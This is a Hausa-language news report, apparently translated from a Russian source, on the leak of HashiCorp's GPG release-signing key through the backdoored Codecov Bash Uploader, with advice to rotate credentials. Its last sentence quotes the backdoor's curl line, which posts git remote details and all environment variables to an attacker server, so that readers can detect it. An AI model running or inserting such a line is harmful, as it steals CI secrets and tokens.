HashiCorp, wanda aka sani don haɓaka kayan aikin buɗaɗɗen kayan aikin Vagrant, Packer, Nomad da Terraform, ya ba da sanarwar ɗigon maɓallin GPG mai zaman kansa da aka yi amfani da shi don ƙirƙirar sa hannun dijital wanda ke tabbatar da fitarwa. Maharan da suka sami damar yin amfani da maɓallin GPG na iya yuwuwar yin ɓoyayyun sauye-sauye ga samfuran HashiCorp ta hanyar tabbatar da su da sa hannun dijital daidai. A sa'i daya kuma, kamfanin ya bayyana cewa, a lokacin tantancewar, ba a gano wani burbushin yunkurin yin irin wannan gyara ba.
A halin yanzu, an soke maɓallin GPG da aka lalata kuma an gabatar da sabon maɓalli a wurinsa. Matsalar ta shafi tabbatarwa kawai ta amfani da fayilolin SHA256SUM da SHA256SUM.sig, kuma ba ta shafi ƙirƙirar sa hannun dijital don fakitin Linux DEB da RPM waɗanda aka kawo ta hanyar releases.hashicorp.com, da kuma hanyoyin tabbatarwa don macOS da Windows (AuthentiCode) .
Yaduwar ya faru ne saboda amfani da rubutun Codecov Bash Uploader (codecov-bash) a cikin abubuwan more rayuwa, wanda aka tsara don zazzage rahotannin ɗaukar hoto daga ci gaba da tsarin haɗin kai. A lokacin harin da aka kai kan kamfanin Codecov, an boye wata kofa ta baya a cikin rubutun da aka kayyade, ta inda aka aika da kalmomin sirri da makullin boyewa zuwa uwar garken maharan.
Don yin kutse, maharan sun yi amfani da kuskure wajen ƙirƙirar hoton Codecov Docker, wanda ya ba su damar fitar da bayanai zuwa GCS (Google Cloud Storage), waɗanda suka wajaba don yin canje-canje ga rubutun Bash Uploader da aka rarraba daga codecov.io. gidan yanar gizo. Canje-canjen an sake yin su ne a ranar 31 ga Janairu, ba a gano su ba har tsawon watanni biyu kuma an ba wa maharan damar fitar da bayanan da aka adana a cikin yanayin tsarin haɗin kai na abokin ciniki. Yin amfani da ƙarin lambar ɓarna, maharan na iya samun bayanai game da ma'ajin Git da aka gwada da duk masu canjin yanayi, gami da alamu, maɓallan ɓoyewa da kalmomin shiga da aka watsa zuwa ci gaba da tsarin haɗin kai don tsara damar yin amfani da lambar aikace-aikacen, wuraren ajiya da ayyuka kamar Amazon Web Services da GitHub.
Baya ga kiran kai tsaye, an yi amfani da rubutun Codecov Bash Uploader a matsayin wani ɓangare na sauran masu shigar da su, kamar Codecov-action (Github), Codecov-circleci-orb da Codecov-bitrise-step, waɗanda masu amfani da su ma matsalar ta shafa. Ana ba da shawarar duk masu amfani da codecov-bash da samfuran da ke da alaƙa da su duba kayan aikin su, da kuma canza kalmomin shiga da maɓallan ɓoyewa. Kuna iya bincika kasancewar bayan gida a cikin rubutun ta kasancewar layin curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || gaskiya
source: budenet.ru